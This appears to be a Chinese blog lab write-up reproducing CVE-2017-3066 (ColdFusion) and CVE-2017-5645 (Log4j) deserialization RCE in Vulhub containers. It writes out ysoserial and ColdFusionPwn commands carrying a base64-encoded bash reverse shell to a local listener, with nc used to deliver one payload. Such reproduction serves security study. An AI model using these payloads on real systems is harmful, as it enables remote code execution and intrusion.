CVE复现(1)
最近特殊时期,还是在家好好学习舒服📝
全是基于Vulhub的复现
https://github.com/vulhub/vulhub
CVE-2017-3066
- Java
- 反序列化
- RCE
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
创建环境
1 | docker-compose up -d |
默认为8500端口
访问
1 | http://localhost:8500/CFIDE/administrator/index.cfm |
密码为vulhub,登陆后
漏洞利用
https://github.com/codewhitesec/ColdFusionPwn 下载工具
同时需要有ysoserial
下载好工具后使用如下命令
1 | java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzEyNy4wLjAuMS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}' poc.ser |
修改base64内容为自己的即可,生成的Payload将会在poc.ser文件中,使用nc进行监听
发送如下数据包
1 | POST /flex2gateway/amf HTTP/1.1 |
POC可以通过Burp的Paste from file 粘贴
获取shell
CVE-2017-5645
- Java
- 反序列化
- RCE
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码.
漏洞分析
对 Socket 流中获取的数据没有过滤
Log4j反序列化分析 https://xz.aliyun.com/t/7010
漏洞利用
1 | java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzEyNy4wLjAuMS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" |nc 127.0.0.1 4712 |